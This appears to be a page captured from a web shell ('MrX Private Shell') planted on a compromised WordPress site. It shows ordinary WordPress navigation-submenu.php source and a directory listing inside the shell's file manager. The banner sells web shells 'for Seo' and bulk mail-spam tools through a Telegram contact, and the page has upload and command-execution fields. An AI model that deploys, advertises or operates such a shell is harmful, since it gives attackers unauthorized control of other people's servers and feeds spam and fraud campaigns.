__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * Server-side rendering of the `core/navigation-submenu` block.
 *
 * @package WordPress
 */

/**
 * Build an array with CSS classes and inline styles defining the font sizes
 * which will be applied to the navigation markup in the front-end.
 *
 * @since 5.9.0
 *
 * @param  array $context Navigation block context.
 * @return array Font size CSS classes and inline styles.
 */
function block_core_navigation_submenu_build_css_font_sizes( $context ) {
	// CSS classes.
	$font_sizes = array(
		'css_classes'   => array(),
		'inline_styles' => '',
	);

	$has_named_font_size  = array_key_exists( 'fontSize', $context );
	$has_custom_font_size = isset( $context['style']['typography']['fontSize'] );

	if ( $has_named_font_size ) {
		// Add the font size class.
		$font_sizes['css_classes'][] = sprintf( 'has-%s-font-size', $context['fontSize'] );
	} elseif ( $has_custom_font_size ) {
		// Add the custom font size inline style.
		$font_sizes['inline_styles'] = sprintf(
			'font-size: %s;',
			wp_get_typography_font_size_value(
				array(
					'size' => $context['style']['typography']['fontSize'],
				)
			)
		);
	}

	return $font_sizes;
}

/**
 * Returns the top-level submenu SVG chevron icon.
 *
 * @since 5.9.0
 *
 * @return string
 */
function block_core_navigation_submenu_render_submenu_icon() {
	return '<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12" fill="none" aria-hidden="true" focusable="false"><path d="M1.50002 4L6.00002 8L10.5 4" stroke-width="1.5"></path></svg>';
}

/**
 * Renders the `core/navigation-submenu` block.
 *
 * @since 5.9.0
 *
 * @param array    $attributes The block attributes.
 * @param string   $content    The saved content.
 * @param WP_Block $block      The parsed block.
 *
 * @return string Returns the post content with the legacy widget added.
 */
function render_block_core_navigation_submenu( $attributes, $content, $block ) {
	$navigation_link_has_id = isset( $attributes['id'] ) && is_numeric( $attributes['id'] );
	$is_post_type           = isset( $attributes['kind'] ) && 'post-type' === $attributes['kind'];
	$is_post_type           = $is_post_type || isset( $attributes['type'] ) && ( 'post' === $attributes['type'] || 'page' === $attributes['type'] );

	// Don't render the block's subtree if it is a draft.
	if ( $is_post_type && $navigation_link_has_id && 'publish' !== get_post_status( $attributes['id'] ) ) {
		return '';
	}

	// Don't render the block's subtree if it has no label.
	if ( empty( $attributes['label'] ) ) {
		return '';
	}

	$font_sizes      = block_core_navigation_submenu_build_css_font_sizes( $block->context );
	$style_attribute = $font_sizes['inline_styles'];

	$has_submenu = count( $block->inner_blocks ) > 0;
	$kind        = empty( $attributes['kind'] ) ? 'post_type' : str_replace( '-', '_', $attributes['kind'] );
	$is_active   = ! empty( $attributes['id'] ) && get_queried_object_id() === (int) $attributes['id'] && ! empty( get_queried_object()->$kind );

	if ( is_post_type_archive() ) {
		$queried_archive_link = get_post_type_archive_link( get_queried_object()->name );
		if ( $attributes['url'] === $queried_archive_link ) {
			$is_active = true;
		}
	}

	$show_submenu_indicators = isset( $block->context['showSubmenuIcon'] ) && $block->context['showSubmenuIcon'];
	$open_on_click           = isset( $block->context['openSubmenusOnClick'] ) && $block->context['openSubmenusOnClick'];
	$open_on_hover_and_click = isset( $block->context['openSubmenusOnClick'] ) && ! $block->context['openSubmenusOnClick'] &&
		$show_submenu_indicators;

	$classes = array(
		'wp-block-navigation-item',
	);
	$classes = array_merge(
		$classes,
		$font_sizes['css_classes']
	);
	if ( $has_submenu ) {
		$classes[] = 'has-child';
	}
	if ( $open_on_click ) {
		$classes[] = 'open-on-click';
	}
	if ( $open_on_hover_and_click ) {
		$classes[] = 'open-on-hover-click';
	}
	if ( $is_active ) {
		$classes[] = 'current-menu-item';
	}

	$wrapper_attributes = get_block_wrapper_attributes(
		array(
			'class' => implode( ' ', $classes ),
			'style' => $style_attribute,
		)
	);

	$label = '';

	if ( isset( $attributes['label'] ) ) {
		$label .= wp_kses_post( $attributes['label'] );
	}

	$aria_label = sprintf(
		/* translators: Accessibility text. %s: Parent page title. */
		__( '%s submenu' ),
		wp_strip_all_tags( $label )
	);

	$html = '<li ' . $wrapper_attributes . '>';

	// If Submenus open on hover, we render an anchor tag with attributes.
	// If submenu icons are set to show, we also render a submenu button, so the submenu can be opened on click.
	if ( ! $open_on_click ) {
		$item_url = isset( $attributes['url'] ) ? $attributes['url'] : '';
		// Start appending HTML attributes to anchor tag.
		$html .= '<a class="wp-block-navigation-item__content"';

		// The href attribute on a and area elements is not required;
		// when those elements do not have href attributes they do not create hyperlinks.
		// But also The href attribute must have a value that is a valid URL potentially
		// surrounded by spaces.
		// see: https://html.spec.whatwg.org/multipage/links.html#links-created-by-a-and-area-elements.
		if ( ! empty( $item_url ) ) {
			$html .= ' href="' . esc_url( $item_url ) . '"';
		}

		if ( $is_active ) {
			$html .= ' aria-current="page"';
		}

		if ( isset( $attributes['opensInNewTab'] ) && true === $attributes['opensInNewTab'] ) {
			$html .= ' target="_blank"  ';
		}

		if ( isset( $attributes['rel'] ) ) {
			$html .= ' rel="' . esc_attr( $attributes['rel'] ) . '"';
		} elseif ( isset( $attributes['nofollow'] ) && $attributes['nofollow'] ) {
			$html .= ' rel="nofollow"';
		}

		if ( isset( $attributes['title'] ) ) {
			$html .= ' title="' . esc_attr( $attributes['title'] ) . '"';
		}

		$html .= '>';
		// End appending HTML attributes to anchor tag.

		$html .= '<span class="wp-block-navigation-item__label">';
		$html .= $label;
		$html .= '</span>';

		// Add description if available.
		if ( ! empty( $attributes['description'] ) ) {
			$html .= '<span class="wp-block-navigation-item__description">';
			$html .= wp_kses_post( $attributes['description'] );
			$html .= '</span>';
		}

		$html .= '</a>';
		// End anchor tag content.

		if ( $show_submenu_indicators ) {
			// The submenu icon is rendered in a button here
			// so that there's a clickable element to open the submenu.
			$html .= '<button aria-label="' . esc_attr( $aria_label ) . '" class="wp-block-navigation__submenu-icon wp-block-navigation-submenu__toggle" aria-expanded="false">' . block_core_navigation_submenu_render_submenu_icon() . '</button>';
		}
	} else {
		// If menus open on click, we render the parent as a button.
		$html .= '<button aria-label="' . esc_attr( $aria_label ) . '" class="wp-block-navigation-item__content wp-block-navigation-submenu__toggle" aria-expanded="false">';

		// Wrap title with span to isolate it from submenu icon.
		$html .= '<span class="wp-block-navigation-item__label">';

		$html .= $label;

		$html .= '</span>';

		// Add description if available.
		if ( ! empty( $attributes['description'] ) ) {
			$html .= '<span class="wp-block-navigation-item__description">';
			$html .= wp_kses_post( $attributes['description'] );
			$html .= '</span>';
		}

		$html .= '</button>';

		$html .= '<span class="wp-block-navigation__submenu-icon">' . block_core_navigation_submenu_render_submenu_icon() . '</span>';

	}

	if ( $has_submenu ) {
		// Copy some attributes from the parent block to this one.
		// Ideally this would happen in the client when the block is created.
		if ( array_key_exists( 'overlayTextColor', $block->context ) ) {
			$attributes['textColor'] = $block->context['overlayTextColor'];
		}
		if ( array_key_exists( 'overlayBackgroundColor', $block->context ) ) {
			$attributes['backgroundColor'] = $block->context['overlayBackgroundColor'];
		}
		if ( array_key_exists( 'customOverlayTextColor', $block->context ) ) {
			$attributes['style']['color']['text'] = $block->context['customOverlayTextColor'];
		}
		if ( array_key_exists( 'customOverlayBackgroundColor', $block->context ) ) {
			$attributes['style']['color']['background'] = $block->context['customOverlayBackgroundColor'];
		}

		// This allows us to be able to get a response from wp_apply_colors_support.
		$block->block_type->supports['color'] = true;
		$colors_supports                      = wp_apply_colors_support( $block->block_type, $attributes );
		$css_classes                          = 'wp-block-navigation__submenu-container';
		if ( array_key_exists( 'class', $colors_supports ) ) {
			$css_classes .= ' ' . $colors_supports['class'];
		}

		$style_attribute = '';
		if ( array_key_exists( 'style', $colors_supports ) ) {
			$style_attribute = $colors_supports['style'];
		}

		$inner_blocks_html = '';
		foreach ( $block->inner_blocks as $inner_block ) {
			$inner_blocks_html .= $inner_block->render();
		}

		if ( strpos( $inner_blocks_html, 'current-menu-item' ) ) {
			$tag_processor = new WP_HTML_Tag_Processor( $html );
			while ( $tag_processor->next_tag( array( 'class_name' => 'wp-block-navigation-item' ) ) ) {
				$tag_processor->add_class( 'current-menu-ancestor' );
			}
			$html = $tag_processor->get_updated_html();
		}

		$wrapper_attributes = get_block_wrapper_attributes(
			array(
				'class' => $css_classes,
				'style' => $style_attribute,
			)
		);

		$html .= sprintf(
			'<ul %s>%s</ul>',
			$wrapper_attributes,
			$inner_blocks_html
		);

	}

	$html .= '</li>';

	return $html;
}

/**
 * Register the navigation submenu block.
 *
 * @since 5.9.0
 *
 * @uses render_block_core_navigation_submenu()
 * @throws WP_Error An WP_Error exception parsing the block definition.
 */
function register_block_core_navigation_submenu() {
	register_block_type_from_metadata(
		__DIR__ . '/navigation-submenu',
		array(
			'render_callback' => 'render_block_core_navigation_submenu',
		)
	);
}
add_action( 'init', 'register_block_core_navigation_submenu' );

Filemanager

Name Type Size Permission Actions
archives Folder 0750
audio Folder 0750
avatar Folder 0750
block Folder 0750
button Folder 0750
buttons Folder 0750
calendar Folder 0750
categories Folder 0750
code Folder 0750
column Folder 0750
columns Folder 0750
comment-author-name Folder 0750
comment-content Folder 0750
comment-date Folder 0750
comment-edit-link Folder 0750
comment-reply-link Folder 0750
comment-template Folder 0750
comments Folder 0750
comments-pagination Folder 0750
comments-pagination-next Folder 0750
comments-pagination-numbers Folder 0750
comments-pagination-previous Folder 0750
comments-title Folder 0750
cover Folder 0750
details Folder 0750
embed Folder 0750
file Folder 0750
footnotes Folder 0750
freeform Folder 0750
gallery Folder 0750
group Folder 0750
heading Folder 0750
home-link Folder 0750
html Folder 0750
image Folder 0750
latest-comments Folder 0750
latest-posts Folder 0750
legacy-widget Folder 0750
list Folder 0750
list-item Folder 0750
loginout Folder 0750
media-text Folder 0750
missing Folder 0750
more Folder 0750
navigation Folder 0750
navigation-link Folder 0750
navigation-submenu Folder 0750
nextpage Folder 0750
page-list Folder 0750
page-list-item Folder 0750
paragraph Folder 0750
pattern Folder 0750
post-author Folder 0750
post-author-biography Folder 0750
post-author-name Folder 0750
post-comments-form Folder 0750
post-content Folder 0750
post-date Folder 0750
post-excerpt Folder 0750
post-featured-image Folder 0750
post-navigation-link Folder 0750
post-template Folder 0750
post-terms Folder 0750
post-title Folder 0750
preformatted Folder 0750
pullquote Folder 0750
query Folder 0750
query-no-results Folder 0750
query-pagination Folder 0750
query-pagination-next Folder 0750
query-pagination-numbers Folder 0750
query-pagination-previous Folder 0750
query-title Folder 0750
query-total Folder 0750
quote Folder 0750
read-more Folder 0750
rss Folder 0750
search Folder 0750
separator Folder 0750
shortcode Folder 0750
site-logo Folder 0750
site-tagline Folder 0750
site-title Folder 0750
social-link Folder 0750
social-links Folder 0750
spacer Folder 0750
table Folder 0750
tag-cloud Folder 0750
template-part Folder 0750
term-description Folder 0750
text-columns Folder 0750
verse Folder 0750
video Folder 0750
widget-group Folder 0750
archives.php File 2.92 KB 0640
avatar.php File 5.61 KB 0640
block.php File 3.24 KB 0640
blocks-json.php File 189.4 KB 0640
button.php File 1.76 KB 0640
calendar.php File 5.93 KB 0640
categories.php File 3.92 KB 0640
comment-author-name.php File 2.08 KB 0640
comment-content.php File 2.4 KB 0640
comment-date.php File 1.82 KB 0640
comment-edit-link.php File 1.67 KB 0640
comment-reply-link.php File 2.03 KB 0640
comment-template.php File 4.39 KB 0640
comments-pagination-next.php File 1.88 KB 0640
comments-pagination-numbers.php File 1.59 KB 0640
comments-pagination-previous.php File 1.75 KB 0640
comments-pagination.php File 1.17 KB 0640
comments-title.php File 2.71 KB 0640
comments.php File 6.61 KB 0640
cover.php File 3.1 KB 0640
file.php File 1.75 KB 0640
footnotes.php File 3.68 KB 0640
gallery.php File 6.29 KB 0640
heading.php File 1.27 KB 0640
home-link.php File 5.31 KB 0640
image.php File 11.74 KB 0640
index.php File 4.99 KB 0640
latest-comments.php File 4.92 KB 0640
latest-posts.php File 8.34 KB 0640
legacy-widget.php File 3.9 KB 0640
list.php File 1.24 KB 0640
loginout.php File 1.38 KB 0640
media-text.php File 4.28 KB 0640
navigation-link.php File 13.59 KB 0640
navigation-submenu.php File 9.71 KB 0640
navigation.php File 48.46 KB 0640
page-list-item.php File 361 B 0640
page-list.php File 13.29 KB 0640
pattern.php File 1.75 KB 0640
post-author-biography.php File 1.49 KB 0640
post-author-name.php File 1.91 KB 0640
post-author.php File 2.67 KB 0640
post-comments-form.php File 2.74 KB 0640
post-content.php File 2.11 KB 0640
post-date.php File 3.05 KB 0640
post-excerpt.php File 3.37 KB 0640
post-featured-image.php File 9.14 KB 0640
post-navigation-link.php File 4.72 KB 0640
post-template.php File 5.61 KB 0640
post-terms.php File 3.55 KB 0640
post-title.php File 2.09 KB 0640
query-no-results.php File 1.8 KB 0640
query-pagination-next.php File 3.7 KB 0640
query-pagination-numbers.php File 4.66 KB 0640
query-pagination-previous.php File 3.5 KB 0640
query-pagination.php File 1.15 KB 0640
query-title.php File 2.05 KB 0640
query-total.php File 2.48 KB 0640
query.php File 5.56 KB 0640
read-more.php File 1.79 KB 0640
require-dynamic-blocks.php File 4.07 KB 0640
require-static-blocks.php File 501 B 0640
rss.php File 3.98 KB 0640
search.php File 22.48 KB 0640
shortcode.php File 735 B 0640
site-logo.php File 6.19 KB 0640
site-tagline.php File 1.17 KB 0640
site-title.php File 1.81 KB 0640
social-link.php File 63.65 KB 0640
tag-cloud.php File 1.55 KB 0640
template-part.php File 9.92 KB 0640
term-description.php File 1.3 KB 0640
widget-group.php File 2.38 KB 0640
Filemanager